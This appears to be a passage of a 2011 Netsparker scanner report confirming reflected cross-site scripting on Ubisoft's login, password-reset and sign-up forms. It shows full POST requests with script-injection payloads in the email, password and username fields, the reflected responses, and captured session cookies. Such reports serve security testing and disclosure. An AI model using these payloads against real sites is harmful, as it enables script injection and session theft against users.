<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_forgotten_password.gif" border="0" /></td>
</tr>
<tr><td></td><td class="mainMessage"><br><br>For security reasons, we don't send passwords via email. You must reset your password. Enter your email address and Date Of Birth, to receive instructions on password resetting.</td></tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldnameerror">Email</font></td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x00042E)</script>" class="inputloginerror"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Date of Birth</font></td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputlogindate"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputlogindate"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputlogindate"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value="y1948">1948</option><option value="y1947">1947</option><option value="y1946">1946</option><option value="y1945">1945</option><option value="y1944">1944</option><option value="y1943">1943</option><option value="y1942">1942</option><option value="y1941">1941</option><option value="y1940">1940</option><option value="y1939">1939</option><option value="y1938">1938</option><option value="y1937">1937</option><option value="y1936">1936</option><option value="y1935">1935</option><option value="y1934">1934</option><option value="y1933">1933</option><option value="y1932">1932</option><option value="y1931">1931</option><option value="y1930">1930</option><option value="y1929">1929</option><option value="y1928">1928</option><option value="y1927">1927</option><option value="y1926">1926</option><option value="y1925">1925</option><option value="y1924">1924</option><option value="y1923">1923</option><option value="y1922">1922</option><option value="y1921">1921</option><option value="y1920">1920</option><option value="y1919">1919</option><option value="y1918">1918</option><option value="y1917">1917</option><option value="y1916">1916</option><option value="y1915">1915</option><option value="y1914">1914</option><option value="y1913">1913</option><option value="y1912">1912</option><option value="y1911">1911</option><option value="y1910">1910</option></select></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="/login/Login.aspx"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagn..
- /login/Login.aspx

/login/Login.aspx CONFIRMED

https://secure.ubi.com/login/Login.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==
login POST 3
password POST '"--></style></script><script>alert(0x000440)</script>
RememberPassword POST 1
_buttonClicked POST submit

Request

POST /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/Login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 208
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg%3d%3d&login=3&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000440)%3c%2fscript%3e&RememberPassword=1&_buttonClicked=submit

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:28:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13560


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">The user name/password combination you entered is not correct. Double check the user name and password, then try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="3" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x000440)</script>" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2fLogin.aspx'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST '"--></style></script><script>alert(0x0004BA)</script>
password POST 3
confirmpassword POST 3
email POST netsparker@example.com
birthdate POST 3
country POST us
ubi_promo POST ubi_promo
shareinfo POST shareinfo
_buttonClicked POST submit
m_ImageButtonSubmit POST 3
m_ImageButtonCancel POST 3

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 349
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004BA)%3c%2fscript%3e&password=3&confirmpassword=3&email=netsparker%40example.com&birthdate=3&country=us&ubi_promo=ubi_promo&shareinfo=shareinfo&_buttonClicked=submit&m_ImageButtonSubmit=3&m_ImageButtonCancel=3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:28:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="'"--></style></script><script>netsparker(0x0004BA)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
